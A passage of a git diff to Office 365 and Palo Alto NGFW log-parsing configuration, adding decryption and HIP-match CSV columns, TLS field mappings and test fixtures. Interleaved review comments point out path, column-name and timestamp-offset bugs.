"result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_logged_in_2.json b/Office 365/o365/tests/user_logged_in_2.json index 93fab6554..563567dc8 100644 --- a/Office 365/o365/tests/user_logged_in_2.json +++ b/Office 365/o365/tests/user_logged_in_2.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/user_login_failed.json b/Office 365/o365/tests/user_login_failed.json index 9156612dc..21fc55744 100644 --- a/Office 365/o365/tests/user_login_failed.json 
+++ b/Office 365/o365/tests/user_login_failed.json @@ -55,6 +55,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..c6cf58abe 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -142,7 +142,7 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USER + - PaloAltoDomain - ReceiveTime - DeviceSN - Type @@ -187,12 +187,12 @@ pipeline: input_field: original.message output_field: message columnnames: - - FUTURE_USE + - PaloAltoDomain - ReceiveTime - DeviceSN - Type - Subtype - - FUTURE_USE + - ConfigVersion - GeneratedTime - VirtualLocation - EventID 
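Review bot: In the fields.yml hunk the only change to `paloalto.vsys` lowercases its description from `The virtual system` to `the virtual system`, which now disagrees with the three new `paloalto.tls.*` descriptions in the same hunk, all of which start with a capital. Unless the lowercase form is the convention elsewhere in the file, keep `description: The virtual system` and drop that line from the change. The new `paloalto.tls.sni` entry would also read better with the acronym spelled out in the generated field reference, e.g. `description: The TLS server name indication (SNI) sent by the client`.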
@@ -382,6 +382,167 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - 
CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse 
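Review bot: The DECRYPTION column list names the issuer column `IssuerSubjectCommonName`, but the `tls.server.x509.issuer.common_name` mapping added later in this diff reads `parsed_event.message.IssuerCommonName`, so for CSV decryption logs that ECS field will never be populated; rename the column to `- IssuerCommonName` (the key the JSON form of the same log uses) or add it as a fallback in the mapping. Likewise the high-resolution timestamp column is `HighResTimestamp` here while the HIPMATCH list and the existing context line use `HighResolutionTimestamp`; if the `parsed_timestamp` stage that follows reads the latter (its properties are outside this hunk), DECRYPTION events will fall back to a timestamp that carries no UTC offset. The two `FUTURE_USE` entries in each list are duplicate column names; whether `dsv.parse-dsv` keeps the last or ignores them, a comment such as `# unused vendor columns, kept for positional alignment` would make the intent explicit.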
@@ -465,7 +626,7 @@ pipeline:
AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}"
REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}'
REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}"
- REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}"
+ REASON3: "When authenticating user '?%{WORD:user}'? from '?%{IP:source_ip}'?, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile '?%{WORD:auth_profile}'?, vsys '?%{WORD:vsys}'?, Server Profile '?%{WORD:server_profile}'?, Server Address '?%{IP:destination_ip}'?"
REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}"
REASON5: 'authenticated for user %{WORD:user}\. auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.'
filter: '{{parsed_event.message.get("EventDescription") != None}}'
@@ -592,7 +753,7 @@ stages:
event.module: "{{parsed_description.message.module}}"
host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}"
host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}"
- host.id: "{{parsed_event.message.deviceExternalId}}"
+ host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}"
host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}"
host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}"
host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}"
@@ -608,6 +769,13 @@ stages:
network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
network.protocol: "{{parsed_description.message.proto}}"
network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+ tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+ tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+ tls.curve: "{{parsed_event.message.EllipticCurve}}"
+ tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+ tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+ tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+ tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -617,7 +785,7 @@ stages:
observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}"
observer.serial_number: "{{parsed_event.message.DeviceSN}}"
observer.name: "{{parsed_event.message.DeviceName}}"
- rule.name: "{{parsed_event.message.Rule}}"
+ rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}"
rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}"
source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}"
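Review bot: `tls.cipher` references `parsed_event.message.message.TLS_AUTH`, a doubled `.message.` path that does not exist, which is consistent with the new `test_decryption_csv.json` fixture expecting only `tls.version` although its input carries `TLS1.3,ECDHE,AES_256_GCM,SHA384`. Correcting the path alone is not enough: the template is a literal prefix plus three interpolations, so on every non-decryption event it would likely render as `TLS___` instead of an empty value, and the JSON form of the log (see `test_decryption_json.json`) uses the key `TLSAuth`, not `TLS_AUTH`. Guard the field on the decryption-only inputs, e.g. `tls.cipher: "{% if parsed_event.message.TLSKeyExchange %}TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLS_AUTH or parsed_event.message.TLSAuth}}{% endif %}"`, and add a comment stating that the value is a PAN-OS composite (key exchange, encryption, auth hash) rather than an IANA cipher-suite name. The `[3:]` slice in `tls.version` assumes the `TLS` prefix and will raise on a missing `TLSVersion` unless the `set` stage tolerates undefined values, which I cannot confirm from this hunk.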
@@ -752,6 +920,9 @@ stages:
paloalto.vsys: "{{parsed_description.message.vsys}}"
paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}"
paloalto.server.profile: "{{parsed_description.message.server_profile}}"
+ paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+ paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+ paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
- set:
paloalto.threat.type: >
{%- set id = parsed_threat.message.threat_code | int -%}
@@ -810,8 +981,8 @@ stages:
user.name: '{{final.user.name.split("\\") | last}}'
filter: '{{final.user.name != null and "\\" in final.user.name}}'
- set:
- user.domain: '{{final.user.email.split("@") | first}}'
- user.name: '{{final.user.email.split("@") | last}}'
+ user.domain: '{{final.user.email.split("@") | last}}'
+ user.name: '{{final.user.email.split("@") | first}}'
filter: '{{final.user.email != null and "@" in final.user.email}}'
- set:
source.user.domain: '{{final.source.user.name.split("\\") | first}}'
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..127226ee3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
@@ -21,6 +21,7 @@
"type": "0"
},
"host": {
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee",
"name": "AAAABBBBB",
"os": {
"version": "Microsoft Windows 10 Pro , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..1d68c400c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
@@ -21,6 +21,7 @@
"type": "0"
},
"host": {
+ "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3",
"name": "2021-02707",
"os": {
"version": "Microsoft Windows 10 Enterprise , 64-bit"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index e8c257c69..f1e6cf2ad 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
@@ -84,7 +84,7 @@
"8.7.6.5"
],
"user": [
- "example.org",
+ "jdoe",
"jdoe@example.org"
]
},
@@ -117,9 +117,9 @@
"top_level_domain": "com"
},
"user": {
- "domain": "jdoe",
+ "domain": "example.org",
"email": "jdoe@example.org",
- "name": "example.org"
+ "name": "jdoe"
},
"user_agent": {
"name": "Microsoft NCSI"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json
new file mode 100644
index 000000000..6a413f53b
--- /dev/null
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", 
+ "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json 
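Review bot: The fixture expects `"@timestamp": "2024-11-03T19:09:43Z"`, yet the same record's high-resolution timestamp field reads `2024-11-03T19:09:43.654+01:00`; if both describe the same instant, as the matching wall-clock value suggests, the UTC time is 18:09:43Z and the expected value is one hour late. That is consistent with the timestamp being taken from the offset-less `GenerateTime` column rather than the `HighResTimestamp` column of the DECRYPTION list, though the `parsed_timestamp` stage that decides this is outside this chunk. Once the high-resolution column is wired into that stage, pin `"@timestamp": "2024-11-03T18:09:43Z"` (at whatever precision the pipeline emits); an offset error shifts every decryption event on an investigation timeline. The fixture also omits `tls.cipher` even though `ECDHE,AES_256_GCM,SHA384` are present in the input, so it currently locks in the absent value rather than the intended one.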
@@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json index 3142ed671..e48b985ca 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json @@ -76,7 +76,7 @@ "9.10.11.12" ], "user": [ - "example.com", + "john.doe", "john.doe@example.com" ] }, @@ -97,9 +97,9 @@ } }, "user": { - "domain": "john.doe", + "domain": "example.com", "email": "john.doe@example.com", - "name": "example.com" + "name": "john.doe" } } } \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json 
